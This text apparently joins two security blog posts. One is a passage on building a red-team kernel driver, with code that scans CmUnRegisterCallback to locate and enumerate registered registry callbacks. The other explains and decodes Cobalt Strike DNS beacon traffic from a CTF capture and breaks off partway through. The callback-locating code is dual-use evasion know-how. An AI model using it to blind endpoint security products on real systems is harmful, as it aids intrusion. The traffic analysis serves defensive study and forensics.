|   |   +-- Common.h                | contains structs and IOCTLs shared between the driver and CLI
|   |   +-- Globals.h               | contains global variables used in all modules
|   |   +-- pch.h                   | precompiled header
|   |   +-- Interceptor.h           | function prototypes
|   |   +-- Intercept.h             | function prototypes
|   |   +-- Callbacks.h             | function prototypes
|   +-- Source Files
|   |   +-- pch.cpp
|   |   +-- Interceptor.cpp         | driver code
|   |   +-- Intercept.cpp           | IRP hooking module
|   |   +-- Callbacks.cpp           | Callback patching module
+-- CLI
|   +-- Source Files
|   |   +-- InterceptorCLI.cpp

2. Driver I/O and why it’s a mess

Something else that needs overhauling is the way the driver handles I/O from the user mode application. When the user mode application requests a listing of all the present drivers on the system, or the registered callbacks, a lot of data needs to be collected and sent back in an efficient and structured manner. I’m not particularly fussy about speed or memory usage, but I would like to keep the code tidy, easy to read and understand, and keep the risk of dangling pointers and memory leaks at a minimum.

Drivers typically handle I/O in 3 different ways:

  1. Using the IRP_MJ_READ dispatch routine with ReadFile()
  2. Using the IRP_MJ_WRITE dispatch routine with WriteFile()
  3. Using the IRP_MJ_DEVICE_CONTROL dispatch routine with DeviceIoControl()

Using 3 different methods:

  1. Buffered I/O
  2. Direct I/O
  3. On an IOCTL basis
    1. METHOD_NEITHER
    2. METHOD_BUFFERED
    3. METHOD_IN_DIRECT
    4. METHOD_OUT_DIRECT

Since Interceptor returns different data depending on the request (IRP) it received, the I/O is handled in the IRP_MJ_DEVICE_CONTROL dispatch routine on an IOCTL basis using METHOD_BUFFERED. As discussed in Part 2, an IRP is accompanied by one or more IO_STACK_LOCATION structures which we can retrieve using IoGetCurrentIrpStackLocation(). The current stack location is important, because it contains several fields with information regarding user buffers.
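To make the "IOCTL basis" more concrete: the transfer method is encoded in the control code itself. The sketch below rebuilds the bit layout of the CTL_CODE macro from the Windows headers as a plain constexpr function so it can be compiled anywhere. The names MakeIoctl, MethodOf and kIoctlExample are made up for illustration and are not taken from the Interceptor source.

```cpp
#include <cstdint>

// Transfer methods and access value as defined in the Windows SDK/WDK headers.
constexpr std::uint32_t kMethodBuffered  = 0;
constexpr std::uint32_t kMethodInDirect  = 1;
constexpr std::uint32_t kMethodOutDirect = 2;
constexpr std::uint32_t kMethodNeither   = 3;
constexpr std::uint32_t kFileAnyAccess   = 0;

// Same bit layout as the CTL_CODE macro:
// DeviceType (bits 31-16) | Access (bits 15-14) | Function (bits 13-2) | Method (bits 1-0)
constexpr std::uint32_t MakeIoctl(std::uint32_t deviceType, std::uint32_t function,
                                  std::uint32_t method, std::uint32_t access) {
    return (deviceType << 16) | (access << 14) | (function << 2) | method;
}

// The two lowest bits tell which transfer method a control code uses.
constexpr std::uint32_t MethodOf(std::uint32_t ioctl) {
    return ioctl & 0x3;
}

// Hypothetical control code: device type 0x8000 and function 0x800 are the
// first values outside the ranges reserved by Microsoft.
constexpr std::uint32_t kIoctlExample =
    MakeIoctl(0x8000, 0x800, kMethodBuffered, kFileAnyAccess);
```

With these values kIoctlExample evaluates to 0x80002000, and MethodOf() returns 0 (METHOD_BUFFERED) for it.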

When using METHOD_BUFFERED, the I/O Manager will assist us with managing resources. When the request comes in, the I/O manager will allocate the system buffer from non-paged pool memory (non-paged pool memory is always present in RAM) with a size that is the maximum of the lengths of the input and output buffers and then copy the user input buffer to the system buffer. When the request is complete, the I/O manager copies the specified number of bytes from the system buffer to the user output buffer.

PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
//size of user input buffer
size_t szBufferIn = stack->Parameters.DeviceIoControl.InputBufferLength;
//size of user output buffer
size_t szBufferOut = stack->Parameters.DeviceIoControl.OutputBufferLength;
//system buffer used for both reading and writing
PVOID bufferInOut = Irp->AssociatedIrp.SystemBuffer;

Using buffered I/O has a drawback, namely we need to define common I/O structures for use in both driver and user mode application, so we know what input, output and size to expect. As an example, we will pass an index and driver name from our user mode application to our driver:

//Common.h
struct USER_DRIVER_DATA {
    char driverName[256];
    int index;
};

//ApplicationCLI.cpp
DWORD lpBytesReturned;
USER_DRIVER_DATA inputBuffer = {};
inputBuffer.index = 1;
//driverName is a fixed-size array, so the string has to be copied into it
strcpy_s(inputBuffer.driverName, "\\Driver\\MyDriver");
DeviceIoControl(hDevice, IOCTL_MYDRIVER_GET_DRIVER_INFO, &inputBuffer, sizeof(inputBuffer), nullptr, 0, &lpBytesReturned, nullptr);

//MyDriver.cpp
auto data = (USER_DRIVER_DATA*)Irp->AssociatedIrp.SystemBuffer;
int index = data->index;
char driverName[256];
strcpy_s(driverName, data->driverName);
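Because the driver casts the system buffer straight to USER_DRIVER_DATA, it is worth checking the buffer first. The following is a minimal user-mode sketch of such a check, not code from Interceptor: IsValidDriverData is a hypothetical helper, and in the driver the length argument would be the InputBufferLength taken from the stack location.

```cpp
#include <cstddef>
#include <cstring>

// Same layout as the shared structure from Common.h in the example above.
struct USER_DRIVER_DATA {
    char driverName[256];
    int index;
};

// Returns true when the buffer is large enough to hold a USER_DRIVER_DATA
// and driverName contains a terminating '\0' within its 256 bytes.
bool IsValidDriverData(const void* buffer, std::size_t length) {
    if (buffer == nullptr || length < sizeof(USER_DRIVER_DATA)) {
        return false;
    }
    const auto* data = static_cast<const USER_DRIVER_DATA*>(buffer);
    return std::memchr(data->driverName, '\0', sizeof(data->driverName)) != nullptr;
}
```

Rejecting the request when this check fails avoids reading past the end of a short buffer or copying an unterminated name.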

Using this approach, we quickly end up with a lot of different structures in Common.h for each of the different I/O requests, so I went looking for a “better”, more generic way of handling I/O. I decided to look at the Mimikatz kernel driver code again for inspiration. The Mimikatz driver uses METHOD_NEITHER, combined with a custom buffer and a wrapper around the RtlStringCbPrintfExW() function.

When using METHOD_NEITHER, the I/O Manager is not involved and it is up to the driver itself to manage the user buffers. The input and output buffer are no longer copied to and from the system buffer.

PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
//user input buffer
PVOID bufferIn = stack->Parameters.DeviceIoControl.Type3InputBuffer;
//user output buffer
PVOID bufferOut = Irp->UserBuffer;

The idea behind the Mimikatz approach is to declare a single buffer structure and a wrapper kprintf() around RtlStringCbPrintfExW():

typedef struct _MY_BUFFER {
    size_t* szBuffer;
    PWSTR* Buffer;
} MY_BUFFER, * PMY_BUFFER;

#define kprintf(MyBuffer, Format, ...) (RtlStringCbPrintfExW(*(MyBuffer)->Buffer, *(MyBuffer)->szBuffer, (MyBuffer)->Buffer, (MyBuffer)->szBuffer, STRSAFE_NO_TRUNCATION, Format, __VA_ARGS__))

The kprintf() wrapper accepts a pointer to our buffer structure MY_BUFFER, a format string and multiple arguments to be used with the format string. Using the provided format string, it will write a byte-counted, null-terminated text string to the supplied buffer *(MyBuffer)->Buffer.

Using this approach, we can dynamically allocate our user output buffer in the user mode application using bufferOut = LocalAlloc(LPTR, szBufferOut). This will allocate the specified number of bytes (szBufferOut) as fixed memory on the heap and initialize it to zero (LPTR (0x0040) flag = LMEM_FIXED (0x0000) + LMEM_ZEROINIT (0x0040) flags).

We can then write to this output buffer in our driver using the kprintf() wrapper:

MY_BUFFER kOutputBuffer = { &szBufferOut, (PWSTR*)&bufferOut };
szBufferOut = stack->Parameters.DeviceIoControl.OutputBufferLength;
bufferOut = Irp->UserBuffer;
szBufferIn = stack->Parameters.DeviceIoControl.InputBufferLength;
bufferIn = stack->Parameters.DeviceIoControl.Type3InputBuffer;

kprintf(&kOutputBuffer, L"Input: %s\nOutput: %s\n", bufferIn, L"our output");
ULONG_PTR information = stack->Parameters.DeviceIoControl.OutputBufferLength - szBufferOut;

return CompleteIrp(Irp, status, information);

If the output buffer appears too small for all the data we wish to write, kprintf() will return STATUS_BUFFER_OVERFLOW. Because the STRSAFE_NO_TRUNCATION flag is set in RtlStringCbPrintfExW(), the contents of the output buffer will not be modified, so we can increase the size, reallocate the output buffer on the heap and try again.
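The "increase the size and try again" step on the user mode side could look roughly like the sketch below. It is only an illustration under stated assumptions: DriverRequest is a hypothetical stand-in for the DeviceIoControl() round trip, QueryWithRetry and the doubling strategy are my own choices, and std::vector replaces LocalAlloc() so the example stays portable.

```cpp
#include <cstddef>
#include <functional>
#include <string>
#include <vector>

// Hypothetical stand-in for the DeviceIoControl() round trip: fills `buffer`
// (capacity `cbBuffer` bytes), reports the bytes written, and returns false
// when the buffer was too small.
using DriverRequest =
    std::function<bool(wchar_t* buffer, std::size_t cbBuffer, std::size_t& cbWritten)>;

// Doubles the buffer size until the request succeeds or cbMax is exceeded.
// Returns an empty string when no attempt succeeded.
std::wstring QueryWithRetry(const DriverRequest& request, std::size_t cbInitial,
                            std::size_t cbMax) {
    // Start with room for at least one character so doubling makes progress.
    std::size_t cb = cbInitial < sizeof(wchar_t) ? sizeof(wchar_t) : cbInitial;
    for (; cb <= cbMax; cb *= 2) {
        // Zero-initialised, like memory returned by LocalAlloc(LPTR, ...).
        std::vector<wchar_t> buffer(cb / sizeof(wchar_t), L'\0');
        std::size_t cbWritten = 0;
        if (request(buffer.data(), buffer.size() * sizeof(wchar_t), cbWritten)) {
            return std::wstring(buffer.data(), cbWritten / sizeof(wchar_t));
        }
    }
    return std::wstring();
}
```

The upper bound cbMax keeps a misbehaving driver from forcing the application into ever larger allocations.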

3. Recalling the callbacks

As mentioned in previous blogposts, locating the different callback arrays and implementing a function to patch them was fairly straightforward. Apart from process and thread callbacks, I also added support for the image load callbacks registered with PsSetLoadImageNotifyRoutineEx(), which notify a driver whenever a new image is loaded or mapped into memory.

Registry and Object creation/duplication callbacks work slightly differently when it comes to how the callback function addresses are stored. Instead of a callback array containing function pointers, the function pointers for registry and object callbacks are stored in a doubly linked list. This means that instead of looking for a callback array address, we’ll be looking for the address of the CallbackListHead.

CallbackListHead

Instead of going the same route as with obtaining the address for the callback arrays by enumerating the instructions in the NotifyRoutine() functions looking for a series of opcodes, I decided to enumerate the CmUnRegisterCallback() function, which is used to remove a registry callback. The reason behind this approach is that in order to obtain the CallbackListHead address via CmRegisterCallback(), we need to follow 2 calls (0xE8) to CmpRegisterCallbackInternal() and CmpInsertCallbackInListByAltitude(). By using CmUnRegisterCallback(), we only need to look for a LEA RCX (0x48 0x8d 0x0d) instruction which puts the address of the CallbackListHead into RCX.

ULONG64 FindCmUnregisterCallbackCallbackListHead() {
	UNICODE_STRING func;
	RtlInitUnicodeString(&func, L"CmUnRegisterCallback");

	ULONG64 funcAddr = (ULONG64)MmGetSystemRoutineAddress(&func);
	if (!funcAddr) {
		return 0;
	}

	//scan the first 0xff bytes of the function for the LEA RCX opcode bytes
	for (ULONG64 instructionAddr = funcAddr; instructionAddr < funcAddr + 0xff; instructionAddr++) {
		if (*(PUCHAR)instructionAddr == OPCODE_LEA_RCX_7[g_WindowsIndex] &&
			*(PUCHAR)(instructionAddr + 1) == OPCODE_LEA_RCX_8[g_WindowsIndex] &&
			*(PUCHAR)(instructionAddr + 2) == OPCODE_LEA_RCX_9[g_WindowsIndex]) {

			//the 4 bytes following the opcode are a signed 32-bit displacement
			LONG offset = 0;
			memcpy(&offset, (PUCHAR)(instructionAddr + 3), sizeof(offset));
			//the displacement is relative to the next instruction (the LEA is 7 bytes long)
			return instructionAddr + 7 + offset;
		}
	}
	return 0;
}
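The address arithmetic is easier to verify outside the kernel. Below is a small user-mode sketch of the same idea that scans an ordinary byte buffer. FindLeaRcxTarget and its base parameter are hypothetical names, the opcode bytes are hard-coded instead of looked up per Windows version, and a little-endian host is assumed.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>

// Scans `code` for "lea rcx, [rip + disp32]" (48 8D 0D xx xx xx xx) and returns
// the absolute address it references, or 0 when no match is found.
// `base` is the address at which code[0] is assumed to be mapped.
std::uint64_t FindLeaRcxTarget(const std::uint8_t* code, std::size_t length,
                               std::uint64_t base) {
    constexpr std::size_t kInstructionLength = 7;  // 3 opcode bytes + 4 displacement bytes
    for (std::size_t i = 0; i + kInstructionLength <= length; ++i) {
        if (code[i] == 0x48 && code[i + 1] == 0x8D && code[i + 2] == 0x0D) {
            std::int32_t displacement = 0;  // signed: the target may lie before RIP
            std::memcpy(&displacement, code + i + 3, sizeof(displacement));
            // RIP already points at the next instruction when the displacement is applied.
            return base + i + kInstructionLength + static_cast<std::int64_t>(displacement);
        }
    }
    return 0;
}
```

For the bytes 90 48 8D 0D 10 00 00 00 mapped at 0x1000, the LEA sits at 0x1001 and the function returns 0x1001 + 7 + 0x10 = 0x1018.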

Once we have the CallbackListHead address, we can use it to enumerate the doubly linked list and retrieve the callback function pointers. The structure we’re working with can be defined as:

typedef struct _CMREG_CALLBACK {
    LIST_ENTRY List;
    ULONG Unknown1;
    ULONG Unknown2;
    LARGE_INTEGER Cookie;
    PVOID Unknown3;
    PEX_CALLBACK_FUNCTION Function;
} CMREG_CALLBACK, *PCMREG_CALLBACK;

The registered callback function pointer is located at offset 0x28.
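The 0x28 offset can be double-checked at compile time. The sketch below mirrors the structure with user-mode stand-in types (all names ending in Sketch are hypothetical) and assumes a 64-bit build, where pointers are 8 bytes wide.

```cpp
#include <cstddef>
#include <cstdint>

// User-mode stand-ins for the kernel types, assuming a 64-bit build.
struct ListEntrySketch {
    ListEntrySketch* Flink;
    ListEntrySketch* Blink;
};
using CallbackFunctionSketch = long (*)(void*, void*, void*);

struct CmRegCallbackSketch {
    ListEntrySketch List;             // 0x00
    std::uint32_t Unknown1;           // 0x10
    std::uint32_t Unknown2;           // 0x14
    std::int64_t Cookie;              // 0x18 (LARGE_INTEGER)
    void* Unknown3;                   // 0x20
    CallbackFunctionSketch Function;  // 0x28
};

static_assert(sizeof(void*) == 8, "sketch assumes 64-bit pointers");
static_assert(offsetof(CmRegCallbackSketch, Function) == 0x28,
              "Function expected at offset 0x28");
```

If the layout of the undocumented structure differs on another Windows build, the offset has to be adjusted accordingly.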

PVOID* CallbackListHead = (PVOID*)FindCmUnregisterCallbackCallbackListHead();
PLIST_ENTRY pEntry;
ULONG64 i;

if (CallbackListHead) {
    for (pEntry = (PLIST_ENTRY)*CallbackListHead, i = 0; NT_SUCCESS(status) && (pEntry != (PLIST_ENTRY)CallbackListHead); pEntry = (PLIST_ENTRY)(pEntry->Flink), i++) {
        ULONG64 callbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x028);
        KdPrint((DRIVER_PREFIX "[%02llu] 0x%llx\n", i, callbackFuncAddr));
        //<truncated>   
    }
}

4. Conclusion

In this blogpost we took a brief look at the structure of the Interceptor kernel driver and how we can handle I/O between the kernel driver and user mode application without the need to create a crazy amount of structures. We then ventured back into callback land and took a peek at obtaining the CallbackListHead address of the doubly linked list containing registered registry callback function pointers (try saying that quickly 5 times in a row 😉 ).

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Cobalt Strike: Decrypting DNS Traffic – Part 5

29 November 2021 at 11:14

Cobalt Strike beacons can communicate over DNS. We show how to decode and decrypt DNS traffic in this blog post.

This series of blog posts describes different methods to decrypt Cobalt Strike traffic. In part 1 of this series, we revealed private encryption keys found in rogue Cobalt Strike packages. In part 2, we decrypted Cobalt Strike traffic starting with a private RSA key. In part 3, we explain how to decrypt Cobalt Strike traffic if you don’t know the private RSA key but do have a process memory dump. And in part 4, we deal with traffic obfuscated with malleable C2 data transforms.

In the first 4 parts of this series, we have always looked at traffic over HTTP (or HTTPS). A beacon can also be configured to communicate over DNS, by performing DNS requests for A, AAAA and/or TXT records. Data flowing from the beacon to the team server is encoded with hexadecimal digits that make up labels of the queried name, and data flowing from the team server to the beacon is contained in the answers of A, AAAA and/or TXT records.

The data needs to be extracted from DNS queries, and then it can be decrypted (with the same cryptographic methods as for traffic over HTTP).

DNS C2 protocol

We use a challenge from the 2021 edition of the Cyber Security Rumble to illustrate what Cobalt Strike DNS traffic looks like.

First we need to take a look at the beacon configuration with tool 1768.py:

Figure 1: configuration of a DNS beacon

Field “payload type” confirms that this is a DNS beacon, and the field “server” tells us what domain is used for the DNS queries: wallet[.]thedarkestside[.]org.

And then a third block of DNS configuration parameters is highlighted in figure 1: maxdns, DNS_idle, … We will explain them when they appear in the DNS traffic we are going to analyze.

Seen in Wireshark, that DNS traffic looks like this:

Figure 2: Wireshark view of Cobalt Strike DNS traffic

We condensed this information (field Info) into this textual representation of DNS queries and replies:

Figure 3: Textual representation of Cobalt Strike DNS traffic

Let’s start with the first set of queries:

Figure 4: DNS_beacon queries and replies

At regular intervals (determined by the sleep settings), the beacon issues an A record DNS query for name 19997cf2[.]wallet[.]thedarkestside[.]org. wallet[.]thedarkestside[.]org are the root labels of every query that this beacon will issue, and this is set inside the config. 19997cf2 is the hexadecimal representation of the beacon ID (bid) of this particular beacon instance. Each running beacon generates a 32-bit number that is used to identify the beacon to the team server. It is different for each running beacon, even when the same beacon executable is started several times. All DNS requests for this particular beacon will have root labels 19997cf2[.]wallet[.]thedarkestside[.]org.

To determine the purpose of a set of DNS queries like above, we need to consult the configuration of the beacon:

Figure 5: zooming in on the DNS settings of the configuration of this beacon (Figure 1)

The following settings define the top label per type of query:

  1. DNS_beacon
  2. DNS_A
  3. DNS_AAAA
  4. DNS_TXT
  5. DNS_metadata
  6. DNS_output

Notice that the values seen in figure 5 for these settings are the default Cobalt Strike profile settings.

For example, if DNS queries issued by this beacon have a name starting with www., then we know that these are queries to send the metadata to the team server.

In the configuration of our beacon, the value of DNS_beacon is (NULL …): that’s an empty string, and it means that no label is put in front of the root labels. Thus, with this, we know that queries with name 19997cf2[.]wallet[.]thedarkestside[.]org are DNS_beacon queries. DNS_beacon queries are what a beacon uses to inquire if the team server has tasks for the beacon in its queue. The reply to this A record DNS query is an IPv4 address, and that address instructs the beacon what to do. To understand what the instruction is, we first need to XOR this replied address with the value of setting DNS_Idle. In our beacon, that DNS_Idle value is 8.8.4.4 (the default DNS_Idle value is 0.0.0.0).

Looking at figure 4, we see that the replies to the first requests are 8.8.4.4. These have to be XORed with DNS_Idle value 8.8.4.4: thus the result is 0.0.0.0. A reply equal to 0.0.0.0 means that there are no tasks inside the team server queue for this beacon, and that it should sleep and check again later. So for the first 5 queries in figure 4, the beacon has to do nothing.

That changes with the 6th query: the reply is IPv4 address 8.8.4.246, and when we XOR that value with 8.8.4.4, we end up with 0.0.0.242. Value 0.0.0.242 instructs the beacon to check for tasks using TXT record queries.
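The XOR step can be reproduced with a few lines of code. This is a minimal sketch and not part of any NVISO tool: the helper names ParseIPv4, XorIPv4 and ToString are made up for this example.

```cpp
#include <array>
#include <cstddef>
#include <cstdint>
#include <sstream>
#include <stdexcept>
#include <string>

using IPv4 = std::array<std::uint8_t, 4>;

// Reads the first four dot-separated octets; throws std::invalid_argument
// when an octet is missing, not numeric or out of range.
IPv4 ParseIPv4(const std::string& text) {
    IPv4 address{};
    std::istringstream stream(text);
    std::string part;
    for (std::size_t i = 0; i < address.size(); ++i) {
        if (!std::getline(stream, part, '.')) {
            throw std::invalid_argument("too few octets");
        }
        const int value = std::stoi(part);
        if (value < 0 || value > 255) {
            throw std::invalid_argument("octet out of range");
        }
        address[i] = static_cast<std::uint8_t>(value);
    }
    return address;
}

// XORs two addresses octet by octet (reply XOR DNS_Idle).
IPv4 XorIPv4(const IPv4& a, const IPv4& b) {
    IPv4 result{};
    for (std::size_t i = 0; i < result.size(); ++i) {
        result[i] = static_cast<std::uint8_t>(a[i] ^ b[i]);
    }
    return result;
}

std::string ToString(const IPv4& a) {
    return std::to_string(a[0]) + "." + std::to_string(a[1]) + "." +
           std::to_string(a[2]) + "." + std::to_string(a[3]);
}
```

Applied to the values from figure 4, ToString(XorIPv4(ParseIPv4("8.8.4.246"), ParseIPv4("8.8.4.4"))) yields 0.0.0.242.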

Here are the possible values that determine how a beacon should interact with the team server:

Figure 6: possible DNS_Beacon replies

If the least significant bit is set, the beacon should do a checkin (with a DNS_metadata query).

If bits 4 to 2 are cleared, communication should be done with A records.

If bit 2 is set, communication should be done with TXT records.

And if bit 3 is set, communication should be done with AAAA records.

Value 242 is 11110010, thus no checkin has to be performed but tasks should be retrieved via TXT records.
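The bit rules above can be written down as a small decoder. This is a sketch under assumptions: bit 1 is taken to be the least significant bit (which is what the 242 example implies), the names are hypothetical, and checking the TXT bit before the AAAA bit is an arbitrary choice for the case where both would be set. A reply of 0.0.0.0 (no tasks) has to be handled before calling it.

```cpp
#include <cstdint>

enum class Channel { A, TXT, AAAA };

struct BeaconInstruction {
    bool checkin;     // true when a DNS_metadata checkin is requested
    Channel channel;  // record type to use for retrieving tasks
};

// Decodes the last octet of the XORed DNS_beacon reply.
// Bit numbering follows the text: bit 1 is the least significant bit.
BeaconInstruction DecodeInstruction(std::uint8_t lastOctet) {
    BeaconInstruction instruction{};
    instruction.checkin = (lastOctet & 0x01) != 0;  // bit 1
    if (lastOctet & 0x02) {                         // bit 2
        instruction.channel = Channel::TXT;
    } else if (lastOctet & 0x04) {                  // bit 3
        instruction.channel = Channel::AAAA;
    } else {                                        // bits 2 to 4 cleared
        instruction.channel = Channel::A;
    }
    return instruction;
}
```

DecodeInstruction(242) gives no checkin and TXT records, matching the example, while DecodeInstruction(240) gives A records.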

The next set of DNS queries are performed by the beacon because of the instructions (0.0.0.242) it received:

Figure 7: DNS_TXT queries

Notice that the names in these queries start with api., thus they are DNS_TXT queries, according to the configuration (see figure 5). And that is per the instruction of the team server (0.0.0.242).

Although DNS_TXT queries should use TXT records, the very first DNS query of a DNS_TXT query is an A record query. The reply, an IPv4 address, has to be XORed with the DNS_Idle value. So here in our example, 8.8.4.68 XORed with 8.8.4.4 gives 0.0.0.64. This specifies the length (64 bytes) of the encrypted data that will be transmitted over TXT records. Notice that for DNS_A and DNS_AAAA queries, the first query will be an A record query too. It also encodes the length of the encrypted data to be received.

Next the beacon issues as many TXT record queries as necessary. The values of the TXT records are BASE64 strings that have to be concatenated before decoding. The beacon stops issuing TXT record requests once the decoded data has reached the length specified in the A record reply (64 bytes in our example).

Since the beacon can issue these TXT record queries very quickly (depending on the sleep settings), a mechanism is introduced to prevent cached DNS results from interfering with the communication: each name in the DNS queries is made unique with an extra hexadecimal label.

Notice that there is a hexadecimal label between the top label (api in our example) and the root labels (19997cf2[.]wallet[.]thedarkestside[.]org in our example). That hexadecimal label is 07311917 for the first DNS query and 17311917 for the second DNS query. That hexadecimal label consists of a counter and a random number: COUNTER + RANDOMNUMBER.

In our example, the random number is 7311917, and the counter always starts with 0 and increments by 1. That is how each query is made unique, and it also helps to process the replies in the correct order, in case the DNS replies arrive out of order.

Thus, when all the DNS TXT replies have been received (there is only one in our example), the BASE64 string (ZUZBozZmBi10KvISBcqS0nxp32b7h6WxUBw4n70cOLP13eN7PgcnUVOWdO+tDCbeElzdrp0b0N5DIEhB7eQ9Yg== in our example) is decoded and decrypted (we will do this with a tool at the end of this blog post).
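To check that the decoded TXT data indeed matches the announced length, the BASE64 string can be decoded with a small helper. The function below is a generic, minimal BASE64 decoder written for this illustration (it is not taken from the beacon or from our tools). It skips characters outside the alphabet instead of rejecting them.

```cpp
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

// Decodes standard BASE64 (alphabet A-Z a-z 0-9 + /). Decoding stops at the
// first '=' padding character; any other unknown character is skipped.
std::vector<std::uint8_t> Base64Decode(const std::string& text) {
    static const std::string alphabet =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    std::vector<std::uint8_t> output;
    std::uint32_t accumulator = 0;  // holds the most recent 6-bit groups
    int bits = 0;                   // number of not yet emitted bits in the accumulator
    for (char c : text) {
        if (c == '=') {
            break;
        }
        const std::size_t value = alphabet.find(c);
        if (value == std::string::npos) {
            continue;
        }
        accumulator = (accumulator << 6) | static_cast<std::uint32_t>(value);
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            output.push_back(static_cast<std::uint8_t>((accumulator >> bits) & 0xFF));
        }
    }
    return output;
}
```

Decoding the string from our example gives 64 bytes, the length announced in the A record reply. When several TXT replies are received, their values are concatenated first and the result is passed to the decoder in one go.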

This is how DNS beacons receive their instructions (tasks) from the team server. The encrypted bytes are transmitted via DNS A, DNS AAAA or DNS TXT record replies.

When the communication has to be done over DNS A records (0.0.0.240 reply), the traffic looks like this:

Figure 8: DNS_A queries

cdn. is the top label for DNS_A requests (see config figure 5).

The first reply is 8.8.4.116. XORed with 8.8.4.4, this gives 0.0.0.112. Thus 112 bytes of encrypted data have to be received: that’s 112 / 4 = 28 DNS A record replies.

The encrypted data is just taken from the IPv4 addresses in the DNS A record replies. In our example, that’s: 19, 64, 240, 89, 241, 225, …

And for DNS_AAAA queries, the method is exactly the same, except that the top label is www6. in our example (see config figure 5) and that each IPv6 address contains 16 bytes of encrypted data.
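The number of replies follows directly from the announced length and the record size. A tiny sketch of that arithmetic is shown here. RepliesNeeded is a hypothetical helper, and rounding up for lengths that are not a multiple of the record size is my assumption, since the example only shows an exact multiple.

```cpp
#include <cstddef>

constexpr std::size_t kBytesPerARecord = 4;      // one IPv4 address
constexpr std::size_t kBytesPerAAAARecord = 16;  // one IPv6 address

// Number of replies needed to carry `length` bytes, rounding up.
constexpr std::size_t RepliesNeeded(std::size_t length, std::size_t bytesPerRecord) {
    return (length + bytesPerRecord - 1) / bytesPerRecord;
}
```

For the 112 bytes of our example this gives 28 A record replies, or 7 replies if AAAA records were used.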

The encrypted data transmitted via DNS records from the team server to the beacon (e.g., the tasks) has exactly the same format as the encrypted tasks transmitted with http or https. Thus the decryption process is exactly the same.

When the beacon has to transmit its results (output of the tasks) to the team server, it uses DNS_output queries. In our example, these queries start with top label post. Here is an example:

Figure 9: beacon sending results to the team server with DNS_output queries

Each name of a DNS query for a DNS_output query has a unique hexadecimal counter, just like DNS_A, DNS_AAAA and DNS_TXT queries. The data to be transmitted is encoded with hexadecimal digits in labels that are added to the name.

Let’s take the first DNS query (figure 9): post.140.09842910.19997cf2[.]wallet[.]thedarkestside[.]org.

This name breaks down into the following labels:

  • post: DNS_output query
  • 140: transmitted data
  • 09842910: counter + random number
  • 19997cf2: beacon ID
  • wallet[.]thedarkestside[.]org: domain chosen by the operator

The transmitted data of the first query is actually the length of the encrypted data to be transmitted. It has to be decoded as follows: 140 -> 1 40.

The first hexadecimal digit (1 in our example) is a counter that specifies the number of labels that are used to contain the hexadecimal data. Since a DNS label is limited to 63 characters, more than one label needs to be used when 32 bytes or more need to be encoded. That explains the use of a counter. 40 is the hexadecimal data, thus the length of the encrypted data is 64 bytes (0x40).

The second DNS query (figure 9) is: post.2942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b3.4adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42.19842910.19997cf2[.]wallet[.]thedarkestside[.]org.

The name in this query contains the encrypted data (partially) encoded with hexadecimal digits inside labels.

These are the transmitted data labels: 2942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b3.4adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42

The first digit, 2, indicates that 2 labels were used to encode the encrypted data: 942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b3 and 4adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42.

The third DNS query (figure 9) is: post.1debfa06ab4786477.29842910.19997cf2[.]wallet[.]thedarkestside[.]org.

The counter for the labels is 1, and the transmitted data is debfa06ab4786477.

Putting all these labels together in the right order, gives the following hexadecimal data:

942880f933a45cf2d048b0c14917493df0cd10a0de26ea103d0eb1b34adf28c63a97deb5cbe4e20b26902d1ef427957323967835f7d18a42debfa06ab4786477. That’s 128 hexadecimal digits long, or 64 bytes, exactly like specified by the length (40 hexadecimal) in the first query.
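The label handling described above can be sketched in code. The helpers SplitLabels and ExtractOutputHex are hypothetical and only illustrate the decoding rule (first hexadecimal digit = number of data labels). They are not how cs-parse-traffic is implemented.

```cpp
#include <cstddef>
#include <stdexcept>
#include <string>
#include <vector>

// Splits a DNS name into its dot-separated labels.
std::vector<std::string> SplitLabels(const std::string& name) {
    std::vector<std::string> labels;
    std::size_t start = 0;
    while (true) {
        const std::size_t dot = name.find('.', start);
        if (dot == std::string::npos) {
            labels.push_back(name.substr(start));
            break;
        }
        labels.push_back(name.substr(start, dot - start));
        start = dot + 1;
    }
    return labels;
}

// Returns the hexadecimal payload carried by one DNS_output query name.
// labels[0] is the top label ("post" in the example); the first hexadecimal
// digit of labels[1] is the number of data labels.
std::string ExtractOutputHex(const std::string& name) {
    const std::vector<std::string> labels = SplitLabels(name);
    if (labels.size() < 2 || labels[1].empty()) {
        throw std::invalid_argument("no data label");
    }
    const std::size_t count = std::stoul(labels[1].substr(0, 1), nullptr, 16);
    if (count == 0 || labels.size() < count + 1) {
        throw std::invalid_argument("label count mismatch");
    }
    std::string hex = labels[1].substr(1);  // first data label without the count digit
    for (std::size_t i = 2; i <= count; ++i) {
        hex += labels[i];                   // remaining data labels
    }
    return hex;
}
```

For the first query of figure 9 this returns 40 (the length), and concatenating the results for the second and third query gives the 128 hexadecimal digits shown above.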

The hexadecimal data above is the encrypted data transmitted via DNS records from the beacon to the team server (e.g., the task results or output) and it has almost the same format as the encrypted output transmitted with http or https. The difference is the following: with http or https traffic, the format starts with an unencrypted size field (size of the encrypted data). That size field is not present in the format of the DNS_output data.

Decryption

We have developed a tool, cs-parse-traffic, that can decrypt and parse DNS traffic and HTTP(S). Similar to what we did with encrypted HTTP traffic, we will decode encrypted data from DNS queries, use it to find cryptographic keys inside the beacon’s process memory, and then decrypt the DNS traffic.

First we run the tool with an unknown key (-k unknown) to extract the encrypted data from the DNS queries and replies in the capture file:

Figure 10: extracting encrypted data from DNS queries

